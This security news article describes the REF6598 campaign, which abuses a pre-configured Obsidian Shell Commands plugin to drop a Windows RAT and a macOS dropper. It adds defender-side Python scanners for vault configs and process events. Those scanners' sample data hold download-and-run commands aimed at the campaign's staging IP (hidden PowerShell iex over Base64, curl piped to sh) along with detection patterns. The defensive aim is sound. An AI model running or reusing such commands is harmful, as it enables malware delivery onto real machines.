Critical Obsidian Shell Commands Plugin Vulnerability Lets Attackers Run Malware

Emy Elsamnoudy
April 14, 2026 4 Min Read

Key Takeaways

  • A new attack campaign, REF6598, is leveraging the legitimate Obsidian Shell Commands community plugin to deploy cross-platform malware.
  • The attacks target individuals in the financial and cryptocurrency sectors through sophisticated social engineering tactics.
  • The plugin is weaponized to execute attacker-defined commands automatically when an attacker-controlled Obsidian vault is opened; no software vulnerability is exploited at any point.
  • The campaign deploys a new Windows RAT, PHANTOMPULSE, and an AppleScript dropper for macOS, both designed for stealthy execution and C2 communication.
  • No official patch is required for Obsidian itself, but users must be vigilant about plugin sources and social engineering attempts.

Cybersecurity researchers have uncovered a novel attack vector exploiting a popular productivity tool, the Obsidian Shell Commands plugin, to deliver sophisticated cross-platform malware. This method allows threat actors to execute malicious payloads across Windows and macOS systems by weaponizing a trusted community plugin, as detailed in a recent report.

The attackers need no software vulnerability at all: they configure the Obsidian Shell Commands plugin to run arbitrary shell commands, which lets them execute malicious code silently on victims’ machines using nothing but the plugin’s intended functionality.

REF6598 Targets Financial and Crypto Sectors

Dubbed REF6598, the campaign specifically targets professionals within the financial and cryptocurrency industries. The initial approach involves elaborate social engineering, where attackers impersonate venture capital representatives on LinkedIn. Once a target engages, communications are steered to a Telegram group, where additional fake “partners” are introduced to enhance credibility.

Victims are then instructed to use Obsidian, presented as the venture firm’s proprietary management database. They are provided with credentials to access a cloud-hosted vault entirely controlled by the attackers. This seemingly legitimate interaction sets the stage for the compromise.

Elastic Security Labs researchers, including Salim Bitam, Samir Bousseaden, and Daniel Stepanic, identified the campaign after an Elastic Defend alert flagged suspicious PowerShell activity originating from Obsidian. Their investigation confirmed that the Shell Commands plugin, pre-configured within the malicious vault, was set to execute attacker-defined commands immediately upon the vault’s opening, requiring no further user interaction.

Multi-Platform Malware Deployment

The REF6598 campaign is designed for both Windows and macOS environments. On Windows, the attack chain culminates in the deployment of PHANTOMPULSE, a previously undocumented Remote Access Trojan (RAT). This full-featured backdoor is capable of extensive surveillance and control, including keylogging, screenshot capture, process injection, and privilege escalation.

For macOS systems, the attack employs an obfuscated AppleScript dropper, which establishes command-and-control (C2) communication via a Telegram-based fallback mechanism. Both Windows and macOS payloads are engineered to blend with normal application behavior, making them challenging for conventional detection methods to identify.

From Vault Sync to Final Payload

The infection process begins when a victim opens the attacker-controlled Obsidian vault and enables community plugin synchronization. At this point, the attacker-prepared data.json configuration file of the (otherwise legitimate) Shell Commands plugin is silently synced to the victim’s machine and triggers execution.

On Windows, the plugin initiates two Invoke-Expression calls containing Base64-encoded strings. These calls communicate with a staging server at 195.3.222[.]251 to retrieve a PowerShell script. This script then utilizes BitsTransfer to download a 64-bit executable, syncobs.exe, while providing status updates to the C2 server with color-coded messages like “GREEN FILE FOUND ON PC” or “RED DOWNLOAD ERROR.”
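As an added defender-side example (not code from the Elastic report or from the Shell Commands plugin project), the script below triages a vault’s Shell Commands data.json, normally found under the vault’s .obsidian/plugins directory, for the command patterns described above: Invoke-Expression over Base64 strings, BITS downloads, hidden windows and raw-IP URLs. The sample configuration is constructed, and the plugin’s exact JSON schema is an assumption; the scanner walks every string value so it does not depend on that schema.

```python
import json
import re

# Constructed sample of a Shell Commands plugin data.json (the exact schema is an
# assumption; the scanner walks every string value, so it does not depend on it).
# The Base64 string decodes to a URL on the staging IP the report names.
SAMPLE_DATA_JSON = json.dumps({
    "shell_commands": [
        {"id": "a1", "platform_specific_commands": {"default": "git pull"},
         "events": {"after-obsidian-starts": {"enabled": True}}},
        {"id": "b2", "platform_specific_commands": {"default":
            "powershell -w hidden -c \"iex ([Text.Encoding]::UTF8.GetString("
            "[Convert]::FromBase64String('aHR0cDovLzE5NS4zLjIyMi4yNTEvc3RhZ2U=')))\""},
         "events": {"after-obsidian-starts": {"enabled": True}}},
    ]
})

# Indicators drawn from the chain the article describes: Invoke-Expression over
# Base64-encoded strings, BITS downloads, hidden windows, raw-IP URLs.
INDICATORS = {
    "invoke_expression": re.compile(r"(?i)\b(invoke-expression|iex)\b"),
    "base64_decode": re.compile(r"(?i)frombase64string|-enc(odedcommand)?\b"),
    "bits_transfer": re.compile(r"(?i)start-bitstransfer|bitstransfer"),
    "hidden_window": re.compile(r"(?i)-w(indowstyle)?\s+hidden"),
    "long_base64": re.compile(r"[A-Za-z0-9+/]{32,}={0,2}"),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}"),
}

def iter_strings(node, path="$"):
    """Yield (json_path, value) for every string value in the document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from iter_strings(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from iter_strings(value, f"{path}[{index}]")
    elif isinstance(node, str):
        yield path, node

def scan_plugin_config(raw_json):
    """Return one finding per string value that matches any indicator."""
    findings = []
    for path, text in iter_strings(json.loads(raw_json)):
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
        if hits:
            findings.append({"path": path, "indicators": hits, "command": text})
    return findings

if __name__ == "__main__":
    for finding in scan_plugin_config(SAMPLE_DATA_JSON):
        print(finding["path"], finding["indicators"])
```

Any hit on a command that is also wired to a start-up event deserves a look before the vault is opened again, since that is exactly the trigger the campaign relies on.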

The downloaded executable, dubbed PHANTOMPULL by researchers, decrypts an AES-256-CBC-encrypted payload from its own resources and loads it directly into memory using reflective loading. This “fileless” approach ensures the final malware stage is never written to disk, complicating detection by file-based scanning tools. PHANTOMPULL also incorporates a timer queue callback with a 50-millisecond delay, a common anti-sandbox technique. Furthermore, the loader includes dead code blocks and a fake integrity check function, designed to mislead and waste the time of reverse engineers.

PHANTOMPULSE, the ultimate RAT payload, employs a unique C2 resolution technique that leverages public Ethereum blockchain data. The malware queries Blockscout APIs across three distinct blockchain networks, extracting XOR-encrypted C2 URLs from the input fields of transactions linked to a hardcoded wallet address. Researchers identified a critical flaw in this design: since PHANTOMPULSE always selects the most recent transaction without sender verification, anyone with the wallet address and XOR key could submit a new transaction to redirect all infected hosts to a sinkhole server, effectively neutralizing the threat actors’ control.

What You Should Do

  • Exercise Extreme Caution with Plugins: Avoid installing community plugins from untrusted sources. Always verify the legitimacy and reputation of any plugin before enabling it in Obsidian or similar applications.
  • Implement Strong Social Engineering Awareness: Educate employees, especially those in financial and cryptocurrency roles, about sophisticated phishing and social engineering tactics, particularly those involving professional networking platforms like LinkedIn and encrypted messaging apps.
  • Monitor Electron-based Application Behavior: Organizations should enhance monitoring for unusual child process creation originating from Electron-based applications like Obsidian. Behavioral endpoint detection and response (EDR) solutions are crucial for this.
  • Enforce Plugin Policies: Where possible, establish and enforce clear policies regarding the installation and synchronization of community plugins in productivity tools.
  • Block Known Infrastructure: Update network defenses to block known malicious infrastructure, including the IP address 195.3.222[.]251 and domain panel.fefea22134[.]net.
  • Utilize Detection Signatures: Security teams should integrate Elastic’s published YARA rules for PHANTOMPULL and PHANTOMPULSE into their detection systems to identify these specific threats across their environments.
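As an added example of the Electron-parent monitoring recommended above (not a rule from Elastic or any EDR vendor), the script below classifies process-creation events where Obsidian spawns a shell or script host, and raises the severity when the command line carries the campaign’s traits. The event records and their field names are constructed for the example; the parent and child process name sets are assumptions to adapt to your own estate.

```python
import re

# Constructed process-creation events shaped loosely like EDR telemetry
# (field names are an assumption, not any vendor's schema).
SAMPLE_EVENTS = [
    {"host": "WS-101", "parent": {"name": "Obsidian.exe"},
     "process": {"name": "powershell.exe",
                 "command_line": "powershell -w hidden -c \"iex ([Convert]::FromBase64String('QUJD'))\""}},
    {"host": "WS-101", "parent": {"name": "Obsidian.exe"},
     "process": {"name": "git.exe", "command_line": "git pull"}},
    {"host": "WS-102", "parent": {"name": "explorer.exe"},
     "process": {"name": "powershell.exe", "command_line": "powershell -File C:\\scripts\\backup.ps1"}},
    {"host": "WS-103", "parent": {"name": "Obsidian.exe"},
     "process": {"name": "cmd.exe", "command_line": "cmd /c curl http://195.3.222.251/x -o x.exe"}},
    {"host": "WS-104", "parent": {"name": "Obsidian.exe"},
     "process": {"name": "powershell.exe", "command_line": "powershell -Command Get-Date"}},
    {"host": "MBP-7", "parent": {"name": "Obsidian"},
     "process": {"name": "osascript",
                 "command_line": "osascript -e 'do shell script \"curl http://195.3.222.251/m | sh\"'"}},
]

# Parent names for Obsidian on Windows and macOS; child names that are shells
# or script hosts. Extend both sets for other Electron apps in your estate.
ELECTRON_PARENTS = {"obsidian.exe", "obsidian"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                  "cscript.exe", "mshta.exe", "sh", "bash", "zsh", "osascript"}

# Argument patterns the article attributes to this campaign: Invoke-Expression,
# Base64 decoding, BITS downloads, and URLs pointing at a raw IP address.
SUSPICIOUS_ARGS = re.compile(
    r"(?i)\b(iex|invoke-expression)\b|frombase64string|bitstransfer"
    r"|-enc(odedcommand)?\s+[A-Za-z0-9+/=]{20,}|https?://\d{1,3}(\.\d{1,3}){3}")

def classify(event):
    """Return an alert dict for an Electron-app -> shell spawn, else None."""
    parent = event["parent"]["name"].lower()
    child = event["process"]["name"].lower()
    if parent not in ELECTRON_PARENTS or child not in SHELL_CHILDREN:
        return None
    high = SUSPICIOUS_ARGS.search(event["process"]["command_line"]) is not None
    return {"host": event["host"], "parent": parent, "child": child,
            "severity": "high" if high else "medium"}

def detect(events):
    """Run classify() over a batch of events and keep only the alerts."""
    return [alert for alert in map(classify, events) if alert]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Medium-severity alerts still matter: a benign-looking shell spawned by Obsidian is unusual enough on most endpoints to be worth a baseline, and the plugin can launch any command, not only the ones seen in this campaign.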
